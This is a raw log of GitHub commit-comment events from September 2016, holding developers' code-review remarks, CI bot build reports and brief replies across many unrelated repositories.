{"id":"4587103660","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19089362,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-20T02:26:21Z","updated_at":"2016-09-20T02:26:21Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-20T02:26:21Z"}
{"id":"4587103807","type":"CommitCommentEvent","actor":{"login":"hoslersk"},"repo":{"name":"hoslersk/space-invaders-web-0716"},"payload":{"comment":{"id":19089363,"position":null,"line":null,"path":null,"commit_id":"6d749cc690a263de6a000742f066d3f588cd9f33","created_at":"2016-09-20T02:26:24Z","updated_at":"2016-09-20T02:26:24Z","body":"Worked w/ @silvanagv, @mahatikg, and @francisrocco."}},"created_at":"2016-09-20T02:26:24Z"}
{"id":"4587104747","type":"CommitCommentEvent","actor":{"login":"benjaminoakes"},"repo":{"name":"Liaison-Intl/upgrade_toolbelt"},"payload":{"comment":{"id":19089367,"position":null,"line":null,"path":null,"commit_id":"06bdf6a09343f8166e47d77bc20dee53bab929e3","created_at":"2016-09-20T02:26:47Z","updated_at":"2016-09-20T02:26:47Z","body":"Just a reminder, this is a public repo."}},"created_at":"2016-09-20T02:26:47Z"}
{"id":"4587109961","type":"CommitCommentEvent","actor":{"login":"benjaminoakes"},"repo":{"name":"Liaison-Intl/upgrade_toolbelt"},"payload":{"comment":{"id":19089383,"position":30,"line":17,"path":"Dockerfile.upgrade_analyzer","commit_id":"ba79cd3dbbc823d44446f49c5734211698994c6c","created_at":"2016-09-20T02:28:48Z","updated_at":"2016-09-20T02:28:48Z","body":"Why did we drop the versions here?  Also, this pattern will increase build time if we ever change gems, won't it?  I've seen this pattern used elsewhere, but I've found it confusing -- unless you're just trying to reduce the number of layers that are built."}},"created_at":"2016-09-20T02:28:48Z"}
{"id":"4587113852","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19089403,"position":null,"line":null,"path":null,"commit_id":"f091781495f2e4d774a8bde8ff35f4e2de6aafa5","created_at":"2016-09-20T02:30:11Z","updated_at":"2016-09-20T02:30:11Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (2122 of 2475 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f091781495f2e4d774a8bde8ff35f4e2de6aafa5-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-f091781495f2e4d774a8bde8ff35f4e2de6aafa5-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-85.74%25-red.svg)</a> \n"}},"created_at":"2016-09-20T02:30:11Z"}
{"id":"4587115538","type":"CommitCommentEvent","actor":{"login":"jhellerstein"},"repo":{"name":"mwhittaker/high-performance-lattices"},"payload":{"comment":{"id":19089406,"position":null,"line":null,"path":null,"commit_id":"9f906ac2777679c52e2087ffe9b1c5d1190b5346","created_at":"2016-09-20T02:30:46Z","updated_at":"2016-09-20T02:30:46Z","body":"Set intersect is indeed monotonic. Grow either input and the output does not shrink. \n\nSent from a telephone.\n\n> On Sep 19, 2016, at 6:41 PM, Michael Whittaker <notifications@github.com> wrote:\n> \n> Added rewritten lattices without any method.\n> \n> My previous pull request [1] made some comments, questions, and\n> critiques of the code. After talking with @jhellerstein and @cw75, I've\n> begun to integrate the issues discussed in the pull request into code.\n> \n> In this commit, I reorganize the lattices that were previously in\n> `include`. Notably, I introduce a CRTP implementation, separate the\n> lattices into separate files, and ensure the code adheres to\n> clang-format and clang-tidy.\n> \n> I have not ported over the lattice methods yet. I started questioning\n> whether some lattice methods were \"monotonic\". For example, the Bloom^L\n> paper says that set intersection (as a method to sets ordered by subset)\n> is monotonic. I'm not sure I understand that.\n> \n> [1]: https://github.com/cw75/high-performance-lattices/pull/6\n> \n> -- \n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/mwhittaker/high-performance-lattices/commit/9f906ac2777679c52e2087ffe9b1c5d1190b5346\n"}},"created_at":"2016-09-20T02:30:46Z"}
{"id":"4587115792","type":"CommitCommentEvent","actor":{"login":"mattrajca"},"repo":{"name":"ben-ng/swift-range-tree"},"payload":{"comment":{"id":19089409,"position":44,"line":46,"path":"Example/Tests/Tests.swift","commit_id":"b243ec61ecaa70efc63ca29daa6d175a875258ff","created_at":"2016-09-20T02:30:51Z","updated_at":"2016-09-20T02:30:51Z","body":"It might be better having `RangeTree` conform to `Equatable` and then you can just write:\r\n\r\n`XCTAssertEqual(b, expectedTree)`\r\n\r\nYou could create some custom syntax/DSL for creating trees using ASCII art."}},"created_at":"2016-09-20T02:30:51Z"}
{"id":"4587118680","type":"CommitCommentEvent","actor":{"login":"scottwainstock"},"repo":{"name":"scottwainstock/pbm"},"payload":{"comment":{"id":19089421,"position":null,"line":null,"path":null,"commit_id":"a67fa09123d5c47b7409107732904e3e0db2460f","created_at":"2016-09-20T02:31:51Z","updated_at":"2016-09-20T02:31:51Z","body":"9da957ba4489e11ea3342af78308bf589ff60352\n\nOn Mon, Sep 19, 2016 at 2:20 PM, RyanTG <notifications@github.com> wrote:\n\n> What about \"IF user is logged in then '/get_a_profile' resolves to\n> '/user/user_id/profile'\"? I don't see why a logged in user should ever see\n> /get_a_profile, even if they go directly to that url.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/scottwainstock/pbm/commit/a67fa09123d5c47b7409107732904e3e0db2460f#commitcomment-19085958>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAK-Lea-B2cxGz2E-_jjtnhvK1yNa2gcks5qrvyvgaJpZM4J_0Um>\n> .\n>\n"}},"created_at":"2016-09-20T02:31:51Z"}
{"id":"4587120314","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19089426,"position":null,"line":null,"path":null,"commit_id":"856fb6cd8274baf4434fe93cde93fcf42b5e871b","created_at":"2016-09-20T02:32:26Z","updated_at":"2016-09-20T02:32:26Z","body":"Oh nvm i read public class Callback:public Callback"}},"created_at":"2016-09-20T02:32:26Z"}
{"id":"4587120536","type":"CommitCommentEvent","actor":{"login":"wrongu"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089427,"position":833,"line":416,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:32:31Z","updated_at":"2016-09-20T02:32:31Z","body":"Although unlikely in practice, the possibility for recursion to blow up is a bit scary. Should we have a hard limit?"}},"created_at":"2016-09-20T02:32:31Z"}
{"id":"4587121758","type":"CommitCommentEvent","actor":{"login":"mattrajca"},"repo":{"name":"ben-ng/swift-range-tree"},"payload":{"comment":{"id":19089428,"position":13,"line":13,"path":"RangeTree/Classes/RangeTree.swift","commit_id":"b243ec61ecaa70efc63ca29daa6d175a875258ff","created_at":"2016-09-20T02:32:59Z","updated_at":"2016-09-20T02:32:59Z","body":"The `get` is unnecessary:\r\n\r\n```\r\nvar debugDescription: String {\r\n    return rootNode.debugDescription\r\n}\r\n```"}},"created_at":"2016-09-20T02:32:59Z"}
{"id":"4587122325","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19089431,"position":null,"line":null,"path":null,"commit_id":"397f7025fd2eefae3b18b175dcbd7ef48afa19a8","created_at":"2016-09-20T02:33:11Z","updated_at":"2016-09-20T02:33:11Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-397f7025fd2eefae3b18b175dcbd7ef48afa19a8-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-397f7025fd2eefae3b18b175dcbd7ef48afa19a8-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T02:33:11Z"}
{"id":"4587123230","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/XMLTV-Import"},"payload":{"comment":{"id":19089434,"position":null,"line":null,"path":null,"commit_id":"88ca59a3aa3857a3c950fcf2d193d319869a9db8","created_at":"2016-09-20T02:33:31Z","updated_at":"2016-09-20T02:33:31Z","body":"How could you construct an environment that passes \"socket.has_ipv6\", Python is 2.7.11 or higher, Twisted is 15.5.0 or higher?\r\nYour kernel must be borked, all oe-a kernels have IPv6, I spent weeks on adding it even to old DM800 and Azbox."}},"created_at":"2016-09-20T02:33:31Z"}
{"id":"4587123421","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19089435,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T02:33:34Z","updated_at":"2016-09-20T02:33:34Z","body":"Are you trying to implement an elastic buffer (both FIFO sides at the same clock frequency but unknown phase)? Use a small synchronous FIFO with the write pointer initially slightly in advance of the read pointer (need to think of what the FIFO depth and initial pointer positions should be, so that it always operates as intended over the whole reset uncertainty range), and two AsyncResetSynchronizers taking the same reset signal as input and resetting each pointer."}},"created_at":"2016-09-20T02:33:34Z"}
{"id":"4587123502","type":"CommitCommentEvent","actor":{"login":"phated"},"repo":{"name":"gulpjs/vinyl"},"payload":{"comment":{"id":19089437,"position":null,"line":null,"path":null,"commit_id":"38096364be6d82323f310a3c44d90899f552e45d","created_at":"2016-09-20T02:33:36Z","updated_at":"2016-09-20T02:33:36Z","body":"@mcollina I am refactoring these tests and can't seem to get this one working.  It seems to be losing the first chunk, which I thought wasn't possible.  Any ideas?"}},"created_at":"2016-09-20T02:33:36Z"}
{"id":"4587123724","type":"CommitCommentEvent","actor":{"login":"mwhittaker"},"repo":{"name":"mwhittaker/high-performance-lattices"},"payload":{"comment":{"id":19089438,"position":null,"line":null,"path":null,"commit_id":"9f906ac2777679c52e2087ffe9b1c5d1190b5346","created_at":"2016-09-20T02:33:40Z","updated_at":"2016-09-20T02:33:40Z","body":"D'oh! For some reason, I was reading set intersection but thinking about set difference. Of course set intersection is monotonic! "}},"created_at":"2016-09-20T02:33:40Z"}
{"id":"4587124300","type":"CommitCommentEvent","actor":{"login":"mattrajca"},"repo":{"name":"ben-ng/swift-range-tree"},"payload":{"comment":{"id":19089439,"position":34,"line":34,"path":"RangeTree/Classes/RangeTree.swift","commit_id":"b243ec61ecaa70efc63ca29daa6d175a875258ff","created_at":"2016-09-20T02:33:54Z","updated_at":"2016-09-20T02:33:54Z","body":"Seems like this could be `private`."}},"created_at":"2016-09-20T02:33:54Z"}
{"id":"4587128324","type":"CommitCommentEvent","actor":{"login":"lhendrich"},"repo":{"name":"lhendrich/hello-world"},"payload":{"comment":{"id":19089448,"position":null,"line":null,"path":null,"commit_id":"71927439ce0b6e26658069ddaaab5c4c5f85f4ed","created_at":"2016-09-20T02:35:22Z","updated_at":"2016-09-20T02:35:22Z","body":"This is an initial comment"}},"created_at":"2016-09-20T02:35:22Z"}
{"id":"4587129135","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19089451,"position":null,"line":null,"path":null,"commit_id":"397f7025fd2eefae3b18b175dcbd7ef48afa19a8","created_at":"2016-09-20T02:35:40Z","updated_at":"2016-09-20T02:35:40Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-397f7025fd2eefae3b18b175dcbd7ef48afa19a8-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-397f7025fd2eefae3b18b175dcbd7ef48afa19a8-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T02:35:40Z"}
{"id":"4587130537","type":"CommitCommentEvent","actor":{"login":"wrongu"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089454,"position":748,"line":331,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:36:13Z","updated_at":"2016-09-20T02:36:13Z","body":"Is the assumption here that the recursive call from `is_ladder_escape` would never suggest an illegal move?"}},"created_at":"2016-09-20T02:36:13Z"}
{"id":"4587131327","type":"CommitCommentEvent","actor":{"login":"wrongu"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089457,"position":757,"line":340,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:36:32Z","updated_at":"2016-09-20T02:36:32Z","body":"More verbose names for `nx,ny` and `px,py` will help readability.\r\n\r\n`nx` can be `prey_x`, e.g."}},"created_at":"2016-09-20T02:36:32Z"}
{"id":"4587134076","type":"CommitCommentEvent","actor":{"login":"thouis"},"repo":{"name":"thouis/AlphaGo"},"payload":{"comment":{"id":19089464,"position":833,"line":416,"path":"AlphaGo/go.py","commit_id":"243dd77a6edbf369eb398b29bfc1a724950c5b2f","created_at":"2016-09-20T02:37:33Z","updated_at":"2016-09-20T02:37:33Z","body":"Maybe.  If so, I vote for 19*4 (though some ladders can \"bend\")."}},"created_at":"2016-09-20T02:37:33Z"}
{"id":"4587137764","type":"CommitCommentEvent","actor":{"login":"raaverook"},"repo":{"name":"raaverook/staff2go"},"payload":{"comment":{"id":19089474,"position":null,"line":null,"path":null,"commit_id":"0c45eefbe585f4ecbdc82dc440af3191e802109f","created_at":"2016-09-20T02:38:58Z","updated_at":"2016-09-20T02:38:58Z","body":"staff-2go.com"}},"created_at":"2016-09-20T02:38:58Z"}
{"id":"4587139436","type":"CommitCommentEvent","actor":{"login":"mattrajca"},"repo":{"name":"ben-ng/swift-range-tree"},"payload":{"comment":{"id":19089479,"position":462,"line":462,"path":"RangeTree/Classes/RangeTree.swift","commit_id":"b243ec61ecaa70efc63ca29daa6d175a875258ff","created_at":"2016-09-20T02:39:38Z","updated_at":"2016-09-20T02:39:38Z","body":"You can implement the < operator instead. Then you could just write:\r\n\r\n`a < b` instead of `lt(a, b)`"}},"created_at":"2016-09-20T02:39:38Z"}
{"id":"4587142582","type":"CommitCommentEvent","actor":{"login":"nickbradley"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19089482,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-20T02:40:51Z","updated_at":"2016-09-20T02:40:51Z","body":"@CPSC310Bot "}},"created_at":"2016-09-20T02:40:51Z"}
{"id":"4587142651","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19089483,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-20T02:40:53Z","updated_at":"2016-09-20T02:40:53Z","body":"Request received; should be processed within 2 minutes.\nNote: No deliverable specified, using latest."}},"created_at":"2016-09-20T02:40:53Z"}
{"id":"4587142718","type":"CommitCommentEvent","actor":{"login":"CPSC310Bot"},"repo":{"name":"CS310-2016Fall/cpsc310project"},"payload":{"comment":{"id":19089484,"position":null,"line":null,"path":null,"commit_id":"ab30960a91d1d787d9ac0069c992579992a5f3c1","created_at":"2016-09-20T02:40:54Z","updated_at":"2016-09-20T02:40:54Z","body":"Failed to execute tests."}},"created_at":"2016-09-20T02:40:54Z"}
{"id":"4587143758","type":"CommitCommentEvent","actor":{"login":"mattrajca"},"repo":{"name":"ben-ng/swift-range-tree"},"payload":{"comment":{"id":19089486,"position":478,"line":478,"path":"RangeTree/Classes/RangeTree.swift","commit_id":"b243ec61ecaa70efc63ca29daa6d175a875258ff","created_at":"2016-09-20T02:41:19Z","updated_at":"2016-09-20T02:41:19Z","body":"You shouldn't be comparing floats directly since `0.1 * 10 != 0.1 + 0.1 + 0.1 + 0.1 + 0.1 + 0.1 + 0.1 + 0.1 + 0.1 + 0.1`."}},"created_at":"2016-09-20T02:41:19Z"}
{"id":"4587145201","type":"CommitCommentEvent","actor":{"login":"darcicidade"},"repo":{"name":"thanglenguyen/esp8266_thingspeak_homeautomation"},"payload":{"comment":{"id":19089488,"position":null,"line":null,"path":null,"commit_id":"6eb57781699d8515611084e3bc7b59d0e126d9fa","created_at":"2016-09-20T02:41:53Z","updated_at":"2016-09-20T02:41:53Z","body":"thank you for answering.\nI'm new in ESP8266 and ThingSpeak, sorry for my doubts.\nI would like to turn ESP LED through the ThingSepak. it's possible?\nAttached my settings.\nThank you see you later.\n\n\n\n\n\n\n2016-09-19 23:21 GMT-03:00 thanglenguyen <notifications@github.com>:\n\n> This project has been done for long time ago just for demo. I am sorry\n> that I don't have any video or descriptive for it.\n>\n> However, what is your problem right now?\n> Can your ESP8266 connect to internet yet?\n> If it is, so everything is very straightforward. Thingspeak is just\n> application on top of your internet-base device. You can even easily try\n> Thingspeak demo on your own computer by following their instruction on the\n> website. It is pretty easy and descriptive.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/thanglenguyen/esp8266_thingspeak_homeautomation/commit/6eb57781699d8515611084e3bc7b59d0e126d9fa#commitcomment-19089321>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATAaVrouKBO1A26IhPxFm4ERxZ2dO9DOks5qr0M5gaJpZM4KA3Z2>\n> .\n>\n"}},"created_at":"2016-09-20T02:41:53Z"}
{"id":"4587147187","type":"CommitCommentEvent","actor":{"login":"mattrajca"},"repo":{"name":"ben-ng/swift-range-tree"},"payload":{"comment":{"id":19089491,"position":478,"line":478,"path":"RangeTree/Classes/RangeTree.swift","commit_id":"b243ec61ecaa70efc63ca29daa6d175a875258ff","created_at":"2016-09-20T02:42:43Z","updated_at":"2016-09-20T02:42:43Z","body":"Something like `a < b + ε` would be better."}},"created_at":"2016-09-20T02:42:43Z"}
{"id":"4587149453","type":"CommitCommentEvent","actor":{"login":"MrCTX"},"repo":{"name":"MrCTX/FirstRepository"},"payload":{"comment":{"id":19089496,"position":null,"line":null,"path":null,"commit_id":"e0866817ef2e3ace6b330747b44b37016bdf5ad1","created_at":"2016-09-20T02:43:36Z","updated_at":"2016-09-20T02:43:36Z","body":"mymorehei"}},"created_at":"2016-09-20T02:43:36Z"}
{"id":"4587152618","type":"CommitCommentEvent","actor":{"login":"sergiors"},"repo":{"name":"PHPSC/phpsc.github.io"},"payload":{"comment":{"id":19089499,"position":3,"line":3,"path":"js/meetup.js","commit_id":"201dd955ba52008aac4dc08a534d1fcb67643d7b","created_at":"2016-09-20T02:44:51Z","updated_at":"2016-09-20T02:44:51Z","body":"Só tem q colocar isso no repo agora 😬"}},"created_at":"2016-09-20T02:44:51Z"}
{"id":"4587159604","type":"CommitCommentEvent","actor":{"login":"RKolhatkar"},"repo":{"name":"TextSearchy/core_engine"},"payload":{"comment":{"id":19089519,"position":9,"line":24,"path":"src/com/mmcoe/core/utils/StringFinder.java","commit_id":"13b8a22830826caf99d2069a6569b07953af8de1","created_at":"2016-09-20T02:47:30Z","updated_at":"2016-09-20T02:47:30Z","body":"This condition will only work when search will change the paragraph."}},"created_at":"2016-09-20T02:47:30Z"}
{"id":"4587160072","type":"CommitCommentEvent","actor":{"login":"kamcio96"},"repo":{"name":"GlowstoneMC/Glowstone"},"payload":{"comment":{"id":19089520,"position":null,"line":null,"path":null,"commit_id":"b1b26234680816f66cc28ed0cd85771264be0a4d","created_at":"2016-09-20T02:47:41Z","updated_at":"2016-09-20T02:47:41Z","body":"Hmm, But it will return null"}},"created_at":"2016-09-20T02:47:41Z"}
{"id":"4587164225","type":"CommitCommentEvent","actor":{"login":"mastercoms"},"repo":{"name":"GlowstoneMC/Glowstone"},"payload":{"comment":{"id":19089530,"position":null,"line":null,"path":null,"commit_id":"b1b26234680816f66cc28ed0cd85771264be0a4d","created_at":"2016-09-20T02:49:17Z","updated_at":"2016-09-20T02:49:17Z","body":"Which one?"}},"created_at":"2016-09-20T02:49:17Z"}
{"id":"4587164266","type":"CommitCommentEvent","actor":{"login":"SunshineRainn"},"repo":{"name":"SunshineRainn/contnue"},"payload":{"comment":{"id":19089531,"position":1,"line":1,"path":"hello world","commit_id":"554e8c0401409c2220538599c0241f0ec633a9e0","created_at":"2016-09-20T02:49:18Z","updated_at":"2016-09-20T02:49:18Z","body":"sdfa"}},"created_at":"2016-09-20T02:49:18Z"}
{"id":"4587164312","type":"CommitCommentEvent","actor":{"login":"RKolhatkar"},"repo":{"name":"TextSearchy/core_engine"},"payload":{"comment":{"id":19089532,"position":9,"line":24,"path":"src/com/mmcoe/core/utils/StringFinder.java","commit_id":"13b8a22830826caf99d2069a6569b07953af8de1","created_at":"2016-09-20T02:49:19Z","updated_at":"2016-09-20T02:49:19Z","body":"Add a counter for number of paragraphs."}},"created_at":"2016-09-20T02:49:19Z"}
{"id":"4587164819","type":"CommitCommentEvent","actor":{"login":"jhallard"},"repo":{"name":"CamioCam/rtsp"},"payload":{"comment":{"id":19089533,"position":null,"line":null,"path":null,"commit_id":"323ab0d9da147f10d57e764551c8c37a47e02625","created_at":"2016-09-20T02:49:33Z","updated_at":"2016-09-20T02:49:33Z","body":"done with 5109f9c\r\n\r\n```bash\r\njohn@Carters-MacBook-Pro-2: ~/rtsp/configs   (john)\r\n$ curl -u admin:admin \"http://192.168.1.35/form/setStream/?TYPE=0&ENABLE=1&SIZE=HDSIZE&FRAMERATE=20&H264BITRATE=1536&MPEG4BITRATE=1024&MJPEGQUALITY=50&JPEGQUALITY=90&AUDIOCODEC=AACLC&AUDIOBITRATE=16000&AUTH=1&H264BUFFERSEC=0\"\r\n000 Success\r\n```"}},"created_at":"2016-09-20T02:49:33Z"}
{"id":"4587166326","type":"CommitCommentEvent","actor":{"login":"ericgoedtel"},"repo":{"name":"ericgoedtel/starsearch"},"payload":{"comment":{"id":19089539,"position":14,"line":14,"path":"config/secrets.yml","commit_id":"8fa3856e03ee09bae89842f578c19438661812f5","created_at":"2016-09-20T02:50:09Z","updated_at":"2016-09-20T02:50:09Z","body":"lol. hope this isn't important."}},"created_at":"2016-09-20T02:50:09Z"}
{"id":"4587166941","type":"CommitCommentEvent","actor":{"login":"SunshineRainn"},"repo":{"name":"SunshineRainn/contnue"},"payload":{"comment":{"id":19089541,"position":null,"line":null,"path":null,"commit_id":"517af2b1f17bdb162c9de62daaa17a176a4c94ee","created_at":"2016-09-20T02:50:23Z","updated_at":"2016-09-20T02:50:23Z","body":"fafaef"}},"created_at":"2016-09-20T02:50:23Z"}
{"id":"4587168624","type":"CommitCommentEvent","actor":{"login":"ichiren1"},"repo":{"name":"ichiren1/elasticsearch"},"payload":{"comment":{"id":19089549,"position":26,"line":207,"path":"core/src/main/java/org/elasticsearch/action/admin/cluster/health/TransportClusterHealthAction.java","commit_id":"4641254ea60b712fd323a536692acbd79abddd81","created_at":"2016-09-20T02:51:02Z","updated_at":"2016-09-20T02:51:02Z","body":"found\r\n"}},"created_at":"2016-09-20T02:51:02Z"}
{"id":"4587171816","type":"CommitCommentEvent","actor":{"login":"kaschioudi"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":19089570,"position":null,"line":null,"path":null,"commit_id":"ccac7d6439daf89330a7572b2e7c09f560566f05","created_at":"2016-09-20T02:52:20Z","updated_at":"2016-09-20T02:52:20Z","body":"Done. Thanks!"}},"created_at":"2016-09-20T02:52:20Z"}
{"id":"4587172037","type":"CommitCommentEvent","actor":{"login":"NachiketNamjoshi"},"repo":{"name":"TextSearchy/core_engine"},"payload":{"comment":{"id":19089571,"position":9,"line":24,"path":"src/com/mmcoe/core/utils/StringFinder.java","commit_id":"13b8a22830826caf99d2069a6569b07953af8de1","created_at":"2016-09-20T02:52:27Z","updated_at":"2016-09-20T02:52:27Z","body":"Yes yes, eventually."}},"created_at":"2016-09-20T02:52:27Z"}
{"id":"4587173746","type":"CommitCommentEvent","actor":{"login":"balloob"},"repo":{"name":"home-assistant/home-assistant"},"payload":{"comment":{"id":19089574,"position":null,"line":null,"path":null,"commit_id":"e7f9fdca67675fc6ced54b334985c0fb76951034","created_at":"2016-09-20T02:53:09Z","updated_at":"2016-09-20T02:53:09Z","body":"This error appears when you close Home Assistant incorrectly. How are you restarting Home Assistant ?"}},"created_at":"2016-09-20T02:53:09Z"}
{"id":"4587174069","type":"CommitCommentEvent","actor":{"login":"liuyihuansmm"},"repo":{"name":"liuyihuansmm/PCloud"},"payload":{"comment":{"id":19089575,"position":null,"line":null,"path":null,"commit_id":"ea0e63cdfef6bb221cce255081fe77e0eb890b56","created_at":"2016-09-20T02:53:16Z","updated_at":"2016-09-20T02:53:16Z","body":"登录界面从网上down的，仅供学习研究."}},"created_at":"2016-09-20T02:53:16Z"}
{"id":"4587175050","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"MoOx/phenomic"},"payload":{"comment":{"id":19089578,"position":null,"line":null,"path":null,"commit_id":"a6da7be9fed54bdd55284c46f70cfbe521b42e3f","created_at":"2016-09-20T02:53:38Z","updated_at":"2016-09-20T02:53:38Z","body":"We use github feature to do this."}},"created_at":"2016-09-20T02:53:38Z"}
{"id":"4587176568","type":"CommitCommentEvent","actor":{"login":"Fadi5555"},"repo":{"name":"frangarcj/pcsx_rearmed"},"payload":{"comment":{"id":19089582,"position":null,"line":null,"path":null,"commit_id":"9facb65b76d846175f3ef9fbeafd1c590a0e0630","created_at":"2016-09-20T02:54:13Z","updated_at":"2016-09-20T02:54:13Z","body":"Hi there sorry to say this here but for more work in dynarec support please see this link:\r\nhttps://github.com/notaz/pcsx_rearmed/issues/74\r\nThanks"}},"created_at":"2016-09-20T02:54:13Z"}
{"id":"4587177205","type":"CommitCommentEvent","actor":{"login":"Kovensky"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19089585,"position":36,"line":36,"path":"lib/RuleSet.js","commit_id":"a53799c0ac58983860a27648cdc8519b6a562b89","created_at":"2016-09-20T02:54:27Z","updated_at":"2016-09-20T02:54:27Z","body":"Many third party loaders (babel-loader, eslint-loader, etc) will crash at runtime if `options` is used; they have to be used with `query: JSON.stringify(theOptions)`.\r\n\r\nOversight, or do the loaders need to be updated?"}},"created_at":"2016-09-20T02:54:27Z"}
{"id":"4587178082","type":"CommitCommentEvent","actor":{"login":"sghinton"},"repo":{"name":"sghinton/python-class"},"payload":{"comment":{"id":19089588,"position":16,"line":16,"path":"bounce/bounce.py","commit_id":"fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f","created_at":"2016-09-20T02:54:48Z","updated_at":"2016-09-20T02:54:48Z","body":"> If you look at the documentation for the random module\n> (https://docs.python.org/3/library/random.html), I bet you can find a much\n> easier way to do this!\n>\n> --\n> You are receiving this because you authored the thread.\n> Reply to this email directly or view it on GitHub:\n> https://github.com/sghinton/python-class/commit/fbc820f8ca6324fbc4ded65bfe75f9b4f589c38f#commitcomment-19066361\nthanks for the suggestion.\n\n"}},"created_at":"2016-09-20T02:54:48Z"}
{"id":"4587179290","type":"CommitCommentEvent","actor":{"login":"xw2723"},"repo":{"name":"xw2723/ikuup"},"payload":{"comment":{"id":19089593,"position":null,"line":null,"path":null,"commit_id":"ba831be2c7bf242cf722fbb4ee7ed8692931f70b","created_at":"2016-09-20T02:55:16Z","updated_at":"2016-09-20T02:55:16Z","body":"1"}},"created_at":"2016-09-20T02:55:16Z"}
{"id":"4587186549","type":"CommitCommentEvent","actor":{"login":"solleer"},"repo":{"name":"Level-2/Transphporm"},"payload":{"comment":{"id":19089611,"position":null,"line":null,"path":null,"commit_id":"b867beb88428f9120c34e9e6e9639a9ee56df0ed","created_at":"2016-09-20T02:58:01Z","updated_at":"2016-09-20T02:58:01Z","body":"Fixed now"}},"created_at":"2016-09-20T02:58:01Z"}
{"id":"4587186990","type":"CommitCommentEvent","actor":{"login":"kygn1998"},"repo":{"name":"kygn1998-study/egov"},"payload":{"comment":{"id":19089614,"position":null,"line":null,"path":null,"commit_id":"8ce8f3b600435210b442e82505a81a105cca44a4","created_at":"2016-09-20T02:58:11Z","updated_at":"2016-09-20T02:58:11Z","body":"역할관리 커먼 컴퍼넌트추가\r\ncontext-egovuserdetailshelper.xml 주석 해제\r\nEgovLoginController 주석해제"}},"created_at":"2016-09-20T02:58:11Z"}
